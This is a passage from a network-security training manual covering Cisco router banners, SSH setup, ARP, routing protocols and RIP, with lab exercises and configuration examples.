Implementing Cisco Banners
On the Cisco router, there are several types of banners available:
MOTD banner: The MOTD banner is for setting Messages Of The Day. The
MOTD banner is shown to all terminal users who are connected to the
router, before they are asked to input username and password. This may not
be an efficient location for your warning banner, if your company literally
uses this banner to list day-to-day information. You do not want to be setting
the warning banner each and every day, and worrying about missing a day.
Lesson 3: Routers and Access Control Lists 101
This banner is used for sending notices to users, such as if there is an
upcoming system shutdown for upgrading the IOS.
Login banner: The login banner is where the warning banner should be
located. This banner will be shown to each user every time a login attempt
happens. The banner is set in Congure Terminal Mode, and uses a begin-
ning and ending delimiter character. The delimiter can cause confusion, but
is quite simple. Any character can be used as a delimiter, just must make
sure to use the same character at the beginning and the end. In the following
conguration fragment, the letter C is used as the delimiter character:
Router#configure terminal
Router(config)#banner login C
Warning!!! This system is designed solely for the authorized
users of Company X on official business. Users of this system
understand that there is no expectation of privacy, and that
use of the system may be monitored and recorded. Use of this
system is consent to said monitoring and recording. Users of
this system acknowledge that if monitoring finds evidence of
misuse, abuse, and/or criminal activity, that system
operators may provide monitoring and recording data to law
enforcement officials.
C
Router(config)#^Z
Router#
EXEC banner: The EXEC banner is used for setting a message for users
who enter EXEC, or Privileged, Mode. You can create a new banner; use the
same warning banner, or whatever else you wish. The process for setting a
new banner is nearly identical to the process for the login banner. The differ-
ence is in the command. Instead of the command banner login, you use
the command banner exec. In the following conguration fragment, you
can see the exec banner created, with a delimiter of the pound sign (#):
Router#configure terminal
Router(config)#banner exec #
Reminder!!! When you logged into this system, you
acknowledged that you are an authorized user of Company X
systems. You also acknowledged that your use of this system
may be monitored and recorded. Finally, you agreed that if
misuse, abuse, and/or criminal activity are found while
monitoring, that law enforcement officials may be contacted.
#
Router(config)#^Z
Router#
102 Tactical Perimeter Defense
TASK 3A-2
Configuring Login Banners
1. Create the conguration fragment that you would use to create a login
warning banner. You can include whatever text you like for the banner,
but use the letter B as your delimiter.
A possible response is:
Router#configure terminal
Router(config)#banner login B
Warning!!! This is the login banner for the SCNS TPD class.
If you are not a member of this class, you may not access
this system. Users of this system are advised that nearly
everyone is running packet-capturing utilities and everyone
is watching you!
B
Router(config)#^Z
Router#
SSH Overview
Although Telnet is used in this courseand is often the method of choice for
many administratorsfrom a security perspective, it is not a solid option. This is
due to the fact that there is no encryption on the session; all commands and
responses are cleartext and can be viewed by any packet-capture utility.
SSH, or Secure Shell, provides for a higher level of security on remote connec-
tions to the router. Using RSA public key cryptography, SSH establishes a secure
channel of communication between client and server.
Cisco IOS support for SSH is not present in older versions of the IOS, such as
11.2 and 11.3. After version 12.0(5) with IPSec, support for SSH was included.
And, only IOS versions that have IPSec will have SSH support.
In order for SSH sessions to be established, there is some preparation that must
take place on the router. The router must have usernames dened, must have a
hostname dened, and must have a domain name set.
Router Configuration to use SSH
In implementing SSH, you should use Access Control Lists, controlling VTY
access. A later section fully details an Access Control List (ACL). However, in
brief, the ACL is used to regulate access (denial or permission) to an object on
the router.
In this conguration fragment, ACL 23 is used to dene the host that is allowed
to access the router for administration. The host name of the router is simply
Router and the domain will be scp.mil. The username is SSHUser and the pass-
word for this user is No+3ln3+.
Not all versions of the IOS
support SSH. Versions that
support IPSec also support
SSH.
Lesson 3: Routers and Access Control Lists 103
Router#configure terminal
Router(config)#ip domain-name scp.mil
Router(config)#access-list 23 permit 192.168.51.45
Router(config)#line vty 0 4
Router(config-line)#access-class 23 in
Router(config-line)#exit
Router(config)#username SSHUser password No+3ln3+
Router(config)#line vty 0 4
Router(config-line)#login local
Router(config-line)#exit
Router(config)#
The router conguration is close to being nished, but there is still some work to
be done. RSA must be enabled so that the key pair can be generated and used.
When creating a new key pair, be aware that it may take some time for the pair
to complete. In this fragment, all you will see is the command of creating the key
pair crypto generate RSA and the use of 1024 as the number of bits (Cisco rec-
ommended minimum), and the OK when the calculation is done.
Router#configure terminal
Router(config)#crypto key generate rsa
The name for the keys will be: Router.scp.mil
Choose the size of the key modulus in the range of 360 to 2048
for your General Purpose Keys. Choosing a key modulus greater
than 512 may take a few minutes.
How many bits in the modulus [512]: 1024
Generating RSA keys ...
[OK]
Router(config)#
You have now enabled SSH to run on your router. There are some commands
that you can use to ne-tune the SSH function, and you will need to congure
your client to use SSH.
The following conguration fragment is used to dene the time-out, in seconds,
that the server will wait for the client to provide a password. The default is 120
seconds, and the Cisco recommended time is 90 seconds. In this fragment, the
time has been changed to 45 seconds.
Router#configure terminal
Router(config)#ip ssh timeout 45
Router(config)#^Z
Router#
The next fragment is used to dene the number of retries that will be allowed
before the router drops the connection. The default for this setting is 3, and the
maximum is 5. This is a setting that you may rarely change, but in the fragment,
the retries are set to 2, so after the second bad try, the connection is dropped:
Router#configure terminal
Router(config)#ip ssh authentication-retries 2
Router(config)#^Z
Router#
Finally is the conguration to let the VTY sessions on the router accept both SSH
and Telnet as valid connection types. If you want to have only SSH used, which
is the point here, you would not add the word Telnet to the command.
104 Tactical Perimeter Defense
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#transport input ssh telnet
Router(config-line)#^Z
Router#
SSH Verification
On the router, you will want to run some diagnostic commands to nd out who is
connected and how. These commands will show you the state of your SSH
connections. There are some differences based on the IOS version you are run-
ning, so note that in the following.
If you are running IOS version 12.1, and you want to see the state of SSH con-
nections, including who is connected, use the command show ip ssh. The
following fragment lists what this command will reveal.
Router#show ip ssh
Connection Version Encryption State Username
0 1.5 3DES 4 SSHUser
Router#
If you are running IOS version 12.2, there are two commands for viewing SSH
information. First is the show ip ssh command, only here it lists the details,
such as time-out and version. The second command is show ssh, and this
shows the user connected. The following fragment shows both commands used,
one after the other, and their result onscreen.
Router#show ip ssh
SSH Enabled - version 1.5
Authentication timeout: 45 secs; Authentication retries: 2
Router#show ssh
Connection Version Encryption State Username
0 1.5 3DES Session Started SSHUser
Router#
INSTRUCTOR TASK 3A-3
Configuring SSH on a Router
Setup: Observe as your instructor performs the SSH conguration on
the LEFT and RIGHT routers.
1. Console in to the LEFT router, and switch to EXEC mode.
2. At the LEFT# prompt, enter conf t to switch to cong mode. The
LEFT(cong)# prompt should be displayed.
3. Enter ip domain-name left.com to provide a domain name.
4. Enter crypto key generate rsa to create key pairs. When you are prompted
for the number of bits in the modulus, press Enter to accept the default of
512.
5. Enter ip ssh time-out 120 to set the time-out value to 2 minutes.
6. Enter is ssh authentication-retries 3 to limit the number of unsuccessful
attempts.
Lesson 3: Routers and Access Control Lists 105
7. Enter line vty 0 4 to begin the line conguration. The LEFT(cong-line)#
prompt is displayed.
8. Enter transport input ssh to limit the VTY sessions to accept only SSH
connections.
9. Enter login local to provide for local login.
10. Enter exit to return to the LEFT(cong)# prompt.
11. Enter username sshl01 privilege 15 password sshpass to assign a user name
and password for student station L01.
Repeat this command to assign user names and passwords for all other
student stations on the left side of the classroom.
12. Enter exit to return to the LEFT# prompt.
13. Enter copy ru st to save the conguration changes. Press Enter to accept
the default le name.
14. Enter exit to return to the LEFT> prompt.
15. Disconnect from the LEFT router, and console in to the RIGHT router.
16. Use the steps listed previously as a guide to set up SSH on the RIGHT
router. Use the domain name right.com, and create user names such as
sshr01, sshr02, and so forth.
17. Disconnect from the RIGHT router, and close the console.
18. Try to Telnet to either of the ssh-enabled routers, and ask students to do
the same. None of the attempts should be successful, as you have blocked
Telnet connections on both routers.
Client Configuration to use SSH
Just as there was some conguration required on the server, some conguration is
needed on the client side to run SSH. However, the conguration on the client is
not nearly as complex. In general, a client SSH application must be installed, and
the client must be congured to use the application in communication with the
router. There are several SSH Client programs available, and in this example, the
PuTTY program is used. Figure 3-1 shows an example of the settings for this
application.
106 Tactical Perimeter Defense
Figure 3-1: The client conguration for an SSH session.
During the conguration, you will be asked to provide input on the cryptography
used, and you will select RSA. Additionally, you will be required to present
proper credentials when connecting, meaning the local username on the router
and the password. Once you enter the proper credentials, you will have secure
access, and operation will be no different than using Telnet.
TASK 3A-4
Configuring the SSH Client
Setup: You are logged on to Windows Server 2003 as the renamed
Administrator account. The routers have a limited number of
simultaneous logins, so you might need to take turns accessing
the routers if your class has many students in it.
1. Navigate to the putty.exe le located in C:\Tools\Lesson3.
2. Double-click putty.exe.
3. For Host Name, enter the IP address for your router. Your instructor will
provide the router IP addresses. The router you use is named LEFT or
RIGHT, based on your location in the classroom.
4. Click SSH (Port 22).
5. Click Open to initiate the connection.
Provide students with the
location of the PuTTY
installation program.
Provide students with the
IP addresses for the LEFT
and RIGHT routers.
Lesson 3: Routers and Access Control Lists 107
6. When you are prompted, click Yes to accept the key, and click Yes to con-
tinue the connection. Press Enter to display the login prompt.
7. Enter your ssh user name, such as sshl01. You should be prompted for a
password.
8. Enter sshpass to complete the login sequence.
9. After authentication has taken place, log out and close PuTTY.
Topic 3B
Routing Principles
To be able to secure your routers and routed networks, you need to understand
some basic principles related to routing in general. Lets begin by looking at how
routers and routing t into the OSI Model.
The ARP Process
Most people are aware that routers function at the Network layer, but that state-
ment must be understood as routers route at the Network layer. Routers are
affected by and operate at other layers as well, including the Data Link layer.
The OSI model is the foundation of all network communication. Routers t into
the OSI model just as other devices do, with their primary functionality being at
the Network layer. In this lesson, the vast majority of the content will be focusing
on the Network layer; however, there are important areas of the Data Link layer
that must be investigated as well.
MAC addresses are split into two parts, each containing six hexadecimal digits.
The rst six digits represent the vendor code (manufacturer indicator) or OUI
(Organizational Unique identier), and the second six are left for denition by the
vendor and are often used as a serial number. These unique 48-bit numbers are
designed to be globally unique, meaning that there is only one NIC with a given
MAC address on the entire planet.
ARP (RFC 826) is used to make the connection between the Layer Two and
Layer Three addresses. ARP is used in the following examples of data moving
from one host to another.
The IEEE (Institute of
Electrical and Electronic
Engineers) issues MAC
addresses to network
hardware vendors to ensure
that MAC addresses remain
unique.
Layer Two addresses are
used to get data packets
from one local node to
another local node, while
Layer Three addresses are
used to get data packets
from one network to another
network.
108 Tactical Perimeter Defense
The rst example shows data moving from node 1 to node 2 on a local network
segment. In order for the data to arrive properly, the following steps must occur:
1. Node 1 (knowing the Network layer address of node 2) sends a local broad-
cast on the LAN indicating that Node 1 wishes to learn the Data Link
address for Node 2.
2. Since Node 1 sent a broadcast, all nodes on the local segment receive and
process the request, discarding it when they identify that the broadcast was
not intended for them.
3. Node 2 identies the message requesting its MAC address and responds by
sending its Data Link address. Node 2 also stores the MAC address of Node
1 for future use.
4. Node 1 sends the packet directly to the Data link address of Node 2.
Figure 3-2 shows this process between Node 1 and Node 2 on the same segment.
Figure 3-2: This example shows the process of a local ARP broadcast between two nodes.
To take this concept a bit further, lets look at the process of MAC address reso-
lution if Node 2 is not on the local segment (see Figure 3-3). In order for
communication to take place between Nodes 1 and 2, the following steps must
occur:
1. Node 1 determines that it needs to communicate with Node 2. As with all
TCP/IP communication, Node 1 ANDs its IP address with its subnet mask,
then it ANDs Node 2s IP address with the Node 1 subnet mask.
2. Node 1 compares the results of the two AND processes to determine if they
are the samemeaning that the nodes are on the same networkor
differentmeaning that the nodes are on different networks. In this example,
the results are different, so Node 1 can conclude that Node 2 is situated on a
different network than Node 1.
3. If Node 1s TCP/IP stack is congured with a Default Gateway, Node 1 will
use ARP resolution for the Default Gateway address, as explained in the pre-
vious example (because Node 1s Default Gateway will most likely be on
the same network as Node 1), and store the Default Gateway address as the
address to use for reaching Node 2.
Lesson 3: Routers and Access Control Lists 109
Note: If a Default Gateway is not congured for Node 1, then Node 1 will not be
able to communicate with Node 2. In fact, if a Default Gateway is not congured
and Node 1 attempts to ping Node 2, it should receive a message stating that the
destination host is unreachable. For a ping to be successful across a routed net-
work such as the one in this example, Node 2 should also have an appropriate
Default Gateway in its IP conguration. If Node 2 exists but is not congured with
a Default Gateway, and if Node 1 attempts to ping Node 2, Node 1 should receive a
message stating that the request timed out.
Figure 3-3: This example shows the process of a router returning the ARP request of a
remote node.
These examples are geared towards TCP/IP as a protocol, and we will use
TCP/IP throughout this lesson. IP addressing is the primary example of Network
layer addressing used today.
LAN-to-LAN Routing Process
The process of moving data from one host to another and from LAN to LAN is
not complex. In the example shown in Figure 3-4, there is one router connecting
two networks. There are two hosts dened, one on either network, using TCP/IP.
110 Tactical Perimeter Defense
Figure 3-4: Two networks connected by a single router.
From this diagram, you can see the networks are connected via a single router.
Both interfaces are Ethernet interfaces, and the IP addresses are given. In this
example, node 7 is trying to get a packet to node 10. Since the nodes are in dif-
ferent networks, the packet will need to be routed to reach its goal.
An Ethernet packet will be generated at Node 7 with the IP source address as
10.0.10.115 and the source MAC address as Node 7. The destination IP address
will be 20.0.20.207 with the destination MAC address still unknown.
When the router hears the request for the MAC address of host 20.0.20.207, it
replies to node 7 with its MAC address. Node 7 then sends the packet to the
router with a destination IP address of 20.0.20.207 and the MAC address of the
E0 interface of the router.
Once the router receives the packet, it in turn sends a broadcast for the MAC
address of 20.0.20.207. Node 10 responds to this request, and the router receives
the response. A new packet is then generated by the router, addressed to IP
address 20.0.20.207 from IP address 10.0.10.115 with the source MAC address of
the router, and destination MAC address of Node 10. Node 10 receives the packet
and responds, following the same steps.
Lesson 3: Routers and Access Control Lists 111
LAN-to-WAN Routing Process
The LAN-to-WAN routing process is not much different than the previous
examplethere are simply more steps involved and the packet may change
encapsulations along the way from Ethernet to something else and back to
Ethernet. In the example shown in Figure 3-5, there is a routed network with two
LANs connected via multiple routers in a WAN conguration.
Figure 3-5: Two end nodes connected over multiple routers in a WAN conguration.
112 Tactical Perimeter Defense
For a packet to get from Node 7 to Node 10 in this conguration, there are sev-
eral steps that must happen:
1. Node 7 creates a request for the MAC address of node 50.0.50.150.
2. The router connected to Network 10.0.10.0 sees this request, and realizes it
is the path to the destination network. It replies to Node 7 with its MAC
address.
3. Node 7 creates a packet with the source IP address of 10.0.10.115 and the
destination IP address of 50.0.50.150 and a source MAC of Node 7 and des-
tination MAC of the network 10.0.10.0 router.
4. As the local router receives the packet, the IP source and destination IP
addresses do not change. The encapsulation may change to t the wire, PPP
or Frame Relay for example.
5. The packet is sent from one router to another, each time the IP address does
not change.
6. Once the packet reaches the router for segment 50.0.50.0, the encapsulation
is removed, and you are left with an Ethernet packet with source IP address
10.0.10.115 and destination IP address 50.0.50.150, and source MAC of the
local E0 interface of the local router and destination MAC address of Node
10.
TASK 3B-1
Performing IP and MAC Analysis
Setup: You are logged on to Windows Server 2003 as the renamed
Administrator account.
1. Navigate to C:\Tools\Lesson3 and open ping-arp-mac.cap. The le should
open in Network Monitor.
2. Quickly scroll through the main capture, noting the frames and their
functions. You will see it is a capture of an initial ARP process, then two
consecutive pings (Echo and Echo:Reply) packets.
3. Expand Frame Four.
4. Record the source and destination IP addresses and the source and des-
tination MAC addresses here:
Source IP address: 172.16.10.1
Destination IP address: 172.17.10.1
Source MAC address: 00 D0 09 7F 0D 73
Destination MAC address: 00 00 0C 8D B8 54
If you need to, expand IP and Ethernet so that you can see the addresses.
5. Expand Frame Five, and record those IP and MAC addresses as well.
Lesson 3: Routers and Access Control Lists 113
Source IP address: 172.17.10.1
Destination IP address: 172.16.10.1
Source MAC address: 00 00 0C 8D B8 54
Destination MAC address: 00 D0 09 7F 0D 73
6. Observe that, when pinging 172.17.10.1 from 172.16.10.1, the destination
MAC address is 00000C8DB854.
7. Examine the exchanges in frames 6 and 7, 8 and 9, and 10 and 11 to see
the ping process complete.
8. Expand Frame Twelve, and record those IP and MAC addresses as well.
Source IP address: 172.16.10.1
Destination IP address: 172.18.10.1
Source MAC address: 00 D0 09 7F 0D 73
Destination MAC address: 00 00 0C 8D B8 54
9. Expand Frame Thirteen, and record those IP and MAC addresses as
well.
Source IP address: 172.18.10.1
Destination IP address: 172.16.10.1
Source MAC address: 00 00 0C 8D B8 54
Destination MAC address: 00 D0 09 7F 0D 73
10. Observe that when pinging 172.18.10.1 from 172.16.10.1, the destination
MAC address is 00000C8DB854.
11. Examine the exchanges in frames 14 and 15, 16 and 17, and 18 and 19
to see the ping process complete.
12. Close the capture le, and leave Network Monitor open.
The Routing Process
Figure 3-6 shows a complex network, with many possible paths for the data to
take across the network. The routers will have to communicate with each other in
order to determine the path for the given situation.
114 Tactical Perimeter Defense
Figure 3-6: Potential paths that data can take to get from one node to another.
In order for the routers to exchange their data, they must have mutual paths of
communication. These paths are the actual connections between the routers. By
using logical addressing, the routers are able to have dened networks to transmit
data on. The logical addressing minimizes the use of broadcasting, with the end
result being more bandwidth for data transmission. In Figure 3-7, each segment
with a letter is a unique Layer Three network segment.
Lesson 3: Routers and Access Control Lists 115
Figure 3-7: Logical network addressing used in an internetwork.
The routers will use the information about the paths to which they are connected,
including the type of connection and available bandwidth, to determine the routes
for data to take. For example, the routers might now say for a packet to get from
network A to network N that the packet should take network A to network B to
network D to network H to network J to network K to network M to network N.
There are many times when the fastest route is not a straight path!
Static and Dynamic Routing
In order for the router to be able to make decisions on where data should go, it
needs to consult its routing table. The routing table is the list of available net-
works and the paths to reach those networks. (Routing tables will be discussed in
detail in the next topic.)
Every time a packet reaches a router, the router needs to review the routing table
to determine the appropriate path for the packet. The router must be aware of the
other potential networks and the way to reach these networks.
Static Routes
The creation of these paths can happen either dynamically (automatically) or
statically (manually). The rst of these two concepts, static routing, is dened
here.
116 Tactical Perimeter Defense
A static route is a route that has been manually entered into the router to dene
the path to the remote network. Although its use is not desirable for every situa-
tion, static routing has many advantages, such as:
Precise control over the routes data will take across the network.
Easy to congure in small networks.
Reduced bandwidth use, due to no excessive router traffic.
Reduced load on the routers, due to no need to make complex routing
calculations.
Figure 3-8 shows a simple network conguration with two routers and their
dened networks.
Figure 3-8: Two routers, Finance and Marketing, and the networks they connect.
The conguration fragments for the static routes of the above routers look like
the following:
MarketingRouter#config terminal
MarketingRouter(config)#ip route 10.0.10.0 255.255.255.0
20.0.20.1
MarketingRouter(config-line)#^Z
MarketingRouter#
FinanceRouter#config terminal
FinanceRouter(config)#ip route 30.0.30.0 255.255.255.0 20.0.20.2
FinanceRouter(config-line)#^Z
FinanceRouter#
Dynamic Routes
From the previous example, you can see that the command syntax and time to
enter the static routes is not complex and will not take a lot of time. However,
the previous example is a very small simple network, and it is because of its sim-
plicity that static routes will work.
When the networks become more complex, static routing is not always a reason-
able option. If there were a dozen routers, for example, each connected to several
networks, static routing would become much more complex.
Lesson 3: Routers and Access Control Lists 117
This is where dynamic routing enters the equation. Dynamic routing protocols
can change the conguration of the network when a link goes down. Dynamic
routing protocols can converge to be sure that all routers have a consistent view
of the network. And, dynamic routing protocols have the means to calculate the
best path through an internetwork.
Dynamic routing protocols use mathematical algorithms to determine routes and
communicate with one another. These same routers exchange their information at
dened intervals, and these updates are used to make decisions on routes to take
and reconguration, when required.
Because the routers are exchanging this data frequently, they are able to change
paths and update as needed. This exibility is what makes dynamic routing proto-
cols so desirable. If a router goes down somewhere in the network, the remaining
routers will recongure and nd a way for the data to reach the other side of the
network. An example of this is shown in Figure 3-9.
Figure 3-9: There are several routers and multiple paths data can take across this
internetwork.
In the event that Finance Router 2 goes offline, and these routers are using
dynamic routing, the other routers will recongure themselves to use only the
other Finance Router. When the offline router comes back online, the other rout-
ers in the network will recongure themselves accordingly.
118 Tactical Perimeter Defense
Comparing Routed Protocols and Routing Protocols
One area where people tend to have confusion when dealing with routers is the
difference between routed protocols and routing protocols. They are distinctly
different. In this section, you will learn to differentiate between the two and draw
the boundaries clearly around them so that you can easily and quickly identify
one or the other.
What are Routed Protocols?
For a protocol to be considered a routed protocol, it must have the following
characteristics:
It must contain Network-layer addressing information.
It must have a method of locating a single host on a given network.
Routed protocols are those that have the given information so that user data may
have an addressing method to use in the transportation of data between and
across networks. The routed protocols have enough internal information to dene
the structure and function of various elds inside a given packet.
The most common routed protocol of today (and of the last decade) is the
Internet Protocol, or IP. Other routed protocols are Novells IPX/SPX (Microsofts
version of IPX/SPX is NWLink), and AppleTalk. TCP/IP, IXP/SPX, and
AppleTalk all allow for addressing at the Network layer of the OSI model.
What are Routing Protocols?
While a routed protocol is used to carry data from one host to another, a routing
protocol is used to carry data from one network to another, across multiple
routers. The routing protocol is also the method of transmitting the routing
updates and messages between routers.
Routers will use their assigned routing protocols to create, maintain, and
exchange routing data. The routers can use the same routing protocols to actually
forward the data packets from one network to another, including the decisions on
which path is the best path to take for the data.
These routing protocols can also be used by routers to learn the status and con-
gurations of networks they are not directly connected to. In addition to learning
about other remote networks, the routers will use their routing protocols to tell
remote routers about networks that the remote router is not directly connected to.
Regardless of the routing protocol chosen, the routers must have consistent and
open communication between each other in order to maintain a reliable picture,
or map, of the network. It is this map of the network that all the routers will use
to assist in forwarding data packets from network to network.
Some examples of routing protocols are RIP (Routing Information Protocol),
IGRP (Interior Gateway Routing Protocol), and OSPF (Open Shortest Path First).
Whether the protocol used is RIP, IGRP, or OSPF, it is important to consider that
there is no actual end-user data carried by the routing protocol messages. The
user data is carried by the routed protocol.
Lesson 3: Routers and Access Control Lists 119
The Routing Protocols
The last area to cover in this topic is the actual protocols themselves. Here, we
will discuss the common types of protocols, and look at some examples of the
protocols in action. The two common types of protocols are Distance Vector and
Link-State.
Regardless of whether the protocol is Distance Vector or Link-State, for dynamic
routing to function, two critical router functions must exist:
An updated and consistent routing table.
Scheduled updates between routers.
For the routing protocols to perform these two critical processes, they must con-
form to a given set of rules. These rules are part of the operation of the routing
protocol. Examples of what rules these protocols can dene include:
The frequency of updates between routers.
The amount of data contained in the updates.
The process of nding proper recipients of the router data.
Calculation of the different data paths, and ultimately choosing the most efficient
one based on the given protocol, requires a dened formula. The formula in the
case of routers is known as a routing algorithm.
The routing algorithm is responsible for the actual calculation on determining the
path the data will take as it moves throughout the network. To make this calcula-
tion, the algorithm must use certain variables to create what is known as a metric.
The metric is then what is used in path determination.
Some of the variables that are used to crate the overall metric of a given path are:
Hop Count: This is the number of routers that a data packet must go through
to reach its destination. The formula is that the lower the number of hops,
the lower the overall data has to travel, and therefore is the better path.
Cost: The cost of a link can be dened by the administrator or calculated by
the router. Generally the lower the cost, the faster the route.
Bandwidth: This variable is dened by the overall bandwidth that the link
provides.
MTU (Maximum Transmission Unit): The MTU is the largest message size
(in octets) that a link will route.
Load: This variable is based on the amount of work the CPU has to perform,
and the number of packets the CPU must analyze and make calculations on.
Regardless of the routing protocol chosen, there is no single rule for selecting the
best protocol based on its algorithm. The routing protocol must change to adapt
to the network in the event there are network changes, and both Distance Vector
and Link-State have this ability. When the routers change their tables based on
this update information from the routing protocol, this is called convergence.
When all routers have the same view of the network, the network is converged.
It is the goal of all routing protocols to have fast convergence, so that the routers
maintain a consistent view of the routes available to network segments, and do
not use incorrect data to make routing decisions.
metric:
A random variable x
representing a quantitative
measure accumulated over a
period.
120 Tactical Perimeter Defense
Distance Vector Routing
Distance Vector routing calculates the distance to a given network segment and
the direction (or vector) required to reach the segment. The algorithm of Distance
Vector (Bellman-Ford) is designed to pass the routing table from neighbor to
neighbor. The passing of the routing table is called the update between routers. In
the event there is a topology change, as a router goes offline, an update will be
sent immediately from one router to another.
Figure 3-10: Routers passing the routing table.
In Distance Vector routing, the routing table is passed between routers along the
shared segments. In Figure 3-10, Router A and Router B will share their routing
tables over the segment between them, out Interface E2 of Router A and out of
Interface E0 of Router B.
When the routers receive an update, they add any new information on how to get
to new routes, or better paths (lower hop counts) to known routes. The algorithm
adds one hop to the hop count for every hop that must be crossed to reach the
destination. Figure 3-11 shows a basic routing table with hop count included.
Figure 3-11: A routing table with interfaces dened and hop counts.
In this example, the routing table has been created, and convergence has been
achieved. Both routers have a consistent view of the network, and the routing
tables dene the path to the networks and the interface to forward packets out to
reach the required destinations.
topology:
The map or plan of the
network. The physical
topology describes how the
wires or cables are laid out,
and the logical or electrical
topology describes how the
information ows.
Lesson 3: Routers and Access Control Lists 121
Link-State Routing
Where Distance Vector routing uses hop counts to make the decisions in the rout-
ing table on path determination, Link-State routing uses a more complex metric
system. In Link-State routing, all routers maintain a consistent view of the net-
work, as they do in Distance Vector routing, but they also are all aware of the
complete network topology.
The Link-State routers know each network segment, and the different options for
reaching each segment. Convergence is just as critical in Link-State routing, and
in order to have a converged network, there are steps that must be followed. Fig-
ure 3-12 shows a complex network, and after the diagram, the steps for
convergence will be outlined.
Figure 3-12: In this complex network, 7 routers and 14 network segments are dened.
The steps for network convergence are as follows:
1. The routers identify the routers that are their direct neighbors. For example,
Router 3 will identify Router 6 and Router 4 as neighbors.
2. The routers send LSP (Link State Packets) to the network. The LSPs contain
data on which networks the router can reach. For example, Router 7 would
send LSPs indicating that Router 7 is connected to segments 10.0.0.0, 11.0.
0.0, 12.0.0.0, and 14.0.0.0.
3. The routers in the network accept all the LSPs and build a topology database
of the network. The LSPs from all routers are used to build this consistent
view.
4. The SPF (Shortest Path First) algorithm is used to determine the accessibility
of each network and the shortest path between networks. The SPF algorithm
122 Tactical Perimeter Defense
is executed on all routers, so that they all end up with the same topology
view of the network. Each router knows the best path to every segment.
5. The router uses the SPF calculations to determine the best (shortest) path for
reaching each destination network on the internetwork.
Common Protocols
Here is a quick list of common routing protocols used on Cisco routers:
RIP (Routing Information Protocol) is a Distance-Vector protocol that uses
hop count as its metric.
IGRP (Interior Gateway Routing Protocol) is a routing protocol that uses a
combined metric for routing decisions.
EIGRP (Enhanced Interior Gateway Routing Protocol) is an enhanced ver-
sion of IGRP that combines properties of Link-State and Distance Vector
protocols.
OSPF (Open Shortest Path First) is a Link-State protocol that commonly
replaces RIP in growing internetworks.
BGP (Border Gateway Protocol) is an interdomain routing protocol often
used by Internet Service Providers.
RTMP (Routing Table Maintenance Protocol) is Apples routing protocol.
RTMP routers dynamically update topology changes in the network.
Administrative Distances
As the router has the ability to use static routes, dynamic routes, and multiple
protocols, the ability to see the current routing table becomes even more critical
as the networks complexity increases.
There is a function in the router called administrative distance. The administrative
distance function has one obvious use, and that is managing when two or more
methods in the router are aware of a path to a destination. For example, if you
entered a static route on how to get to a location, then RIP identied a route to
that location, which route should the router use?
This is where the administrative distance comes into play. The lower a value, the
higher the level of trust the router places in that route. Some default administra-
tive distances are listed in the following table.
Route Type Distance
Directly connected interface 0
Static route 1
IGRP route 100
OSPF route 110
RIP route 120
Therefore, if you had a static route and a RIP route, the static route would be the
preferred route that the router uses. When viewing the routing table, not only will
you be shown the current routes to destination networks, but you will also see the
method used. The following conguration fragments show a portion of the rout-
ing tables for three routers in a network:
Lesson 3: Routers and Access Control Lists 123
LEFT#show ip route
R 192.168.10.0/24 [120/1] via 192.168.20.2, 00:00:13, Serial1
C 192.168.20.0/24 is directly connected, Serial1
C 172.16.0.0/16 is directly connected, Ethernet0
R 172.17.0.0/16 [120/1] via 192.168.20.2, 00:00:13, Serial1
R 172.18.0.0/16 [120/2] via 192.168.20.2, 00:00:13, Serial1
CENTER#show ip route
C 192.168.10.0/24 is directly connected, Serial1
C 192.168.20.0/24 is directly connected, Serial0
R 172.16.0.0/16 [120/1] via 192.168.20.1, 00:00:13, Serial0
C 172.17.0.0/16 is directly connected, Ethernet0
R 172.18.0.0/16 [120/1] via 192.168.10.1, 00:00:18, Serial1
RIGHTt#show ip route
C 192.168.10.0/24 is directly connected, Serial0
R 192.168.20.0/24 [120/1] via 192.168.10.2, 00:00:20, Serial0
R 172.16.0.0/16 [120/2] via 192.168.10.2, 00:00:20, Serial0
R 172.17.0.0/16 [120/1] via 192.168.10.2, 00:00:20, Serial0
C 172.18.0.0/16 is directly connected, Ethernet0
In these fragments, you can identify the routes on each router. You can also iden-
tify the routes that are directly connected and the routes that are using RIP. The
way that you identify this is by the letter in front of each route. For example, in
these examples, all routes with a letter C are connected interfaces. Routes with an
R are using RIP. If a route had been input statically, it would have an S in front
of it.
For the RIP routes shown, note that the number 120 is displayed in brackets after
the route. The 120 is an indicator of the administrative distance of this route.
(The number following the slash is the hop count.)
RIP
RIP, or the Routing Information Protocol, is one of the most straightforward rout-
ing protocols that can be implemented. It also has no signicant security, is
broadcast-based, and is noisy.
RIP functions by informing neighboring routers of the routers that the current
router can reach. The current routes are created during the simple conguration
process of setting up RIP in the router.
The following conguration fragments show the conguration of RIP on three
routers, LEFT, RIGHT, and CENTER:
LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.10.0
LEFT(config-router)^Z
LEFT#
RIGHT#configure terminal
RIGHT(config)#router rip
RIGHT(config-router)#network 172.18.0.0
124 Tactical Perimeter Defense
RIGHT(config-router)#network 192.168.20.0
RIGHT(config-router)^Z
RIGHT#
CENTER#configure terminal
CENTER(config)#router rip
CENTER(config-router)#network 172.17.0.0
CENTER(config-router)#network 192.168.10.0
CENTER(config-router)#network 192.168.20.0
CENTER(config-router)^Z
CENTER#
In these fragments, RIP routing has been congured with the networks that each
router can reach. For example, the LEFT router will announce that if there is a
packet destined for network 172.16.0.0, then the other routers should send it to
the LEFT router.
Because RIP is broadcast-based, any host on a segment where RIP broadcasts are
sent can receive the update. Only the router has a legitimate routing function, but
an attacker can learn valuable information, such as the conguration and address-
ing of a network.
TASK 3B-2
Viewing a RIP Capture
Setup: You are logged on to Windows Server 2003 as the renamed
Administrator account, and Network Monitor is running.
1. Open rip update.cap located in C:\Tools\Lesson3.
2. Expand Frame One, and observe the contents of the packet.
3. Look for the destination address of the packet. Find the IP and MAC
destination addresses.
4. Observe the source address. You can conclude that this is likely the source
address of a router in the network.
5. Expand the RIP portion of the frame capture.
6. Examine the network details sent in the packet. Even though you are a
random user on the network, you have captured the packet and are able to
learn quite a few things about the network in a very short amount of time.
7. Close the capture le, and leave Network Monitor open.
RIPv2
In order to address some of the issues associated with RIP, RIPv2 was introduced
as a routing protocol. A security advantage was the ability to require and use
authentication for RIP updates. From a networking perspective, the conguration
is very similar to RIPv1, as shown previously. The following conguration frag-
ment shows the same three routers congured to use RIPv2 instead of RIPv1:
Lesson 3: Routers and Access Control Lists 125
LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#version 2
